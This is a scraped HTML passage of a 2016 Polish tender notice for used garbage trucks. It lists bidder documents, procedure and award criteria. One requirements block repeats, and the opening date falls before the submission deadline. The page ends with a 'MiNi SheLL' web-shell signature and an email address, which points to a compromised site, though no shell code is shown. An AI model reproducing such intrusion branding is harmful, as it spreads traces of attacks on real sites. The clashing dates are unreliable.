- wykazu co najmniej 3 dostaw używanych samochodów ciężarowych przeznaczonych do zbierania i transportu odpadów, (sporządzonego według załącznika nr 4), wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie oraz załączeniem dowodów określających, czy dostawy te wykonane zostały z należytą starannością, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów- oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu;
4.2. w celu potwierdzenia spełnienia warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej lub finansowej zapewniającej wykonanie zamówienia Zamawiający żąda:
- opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca ubezpieczony jest od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia na wartość co najmniej 300.000,00 zł wraz z dokumentem potwierdzającym opłacenie;
4.3. W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu Zamawiający żąda następujących dokumentów: 
- zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
- zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie 
z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
- odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy; 
- zaświadczenia  z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy PZP wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
- oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.W celu wykazania spełnienia warunków przez Wykonawcę oraz podmioty udostępniające zasoby, o których mowa w rozdziale X SIWZ do oferty należy załączyć oświadczenie Wykonawcy o spełnieniu warunków udziału, którego wzór stanowi załącznik nr 2 do niniejszej SIWZ. 
2. W celu wykazania niepodlegania przez Wykonawcę wykluczenia, jak również podmiotów udostepniających zasoby oraz podwykonawców, wykluczenia z postepowania na podstawie art. 24 ust. 1 oraz art. 24 ust. 5 Wykonawca składa oświadczenie, którego wzór stanowi załącznik nr 3 do niniejszej SIWZ. 
3. Zamawiający, zgodnie z art. 24aa. Ustawy Pzp zastrzega sobie możliwość, że może najpierw 
dokonać oceny ofert, a następnie zbadać, czy Wykonawca, którego oferta została oceniona jako najkorzystniejsza, nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu. 
4. W przypadku określonym w punkcie powyższym Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa poniżej:
4.1. w celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej Zamawiający żąda:
- wykazu co najmniej 3 dostaw używanych samochodów ciężarowych przeznaczonych do zbierania i transportu odpadów, (sporządzonego według załącznika nr 4), wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie oraz załączeniem dowodów określających, czy dostawy te wykonane zostały z należytą starannością, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów- oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu;
4.2. w celu potwierdzenia spełnienia warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej lub finansowej zapewniającej wykonanie zamówienia Zamawiający żąda:
- opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca ubezpieczony jest od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem zamówienia na wartość co najmniej 300.000,00 zł wraz z dokumentem potwierdzającym opłacenie;
4.3. W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu Zamawiający żąda następujących dokumentów: 
- zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
- zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie 
z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
- odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy; 
- zaświadczenia  z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy PZP wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
- oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawca w terminie 3 dni od dnia zamieszczenia informacji, o której mowa w art. 86 ust. 5 składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp, albo informację o tym, że nie należy do grupy kapitałowej  wg załącznika nr 6 do SIWZ.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  tak
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  tak
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja na podwozie</td><td>10</td></tr><tr><td>Gwarancja na zabudowę dla śmieciarek jednokomorowych</td><td>15</td></tr><tr><td>Gwarancja na fabrycznie nowe urządzenia hakowe</td><td>15</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru wykonawcy, w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych w projekcie umowy, stanowiącej załącznik nr 7 do SIWZ.

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 16/11/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b><br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Komisyjne otwarcie ofert nastąpi w siedzibie Zamawiającego w dniu 14.11.2016 o godzinie 10.30.
http://wikznin.pl/</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com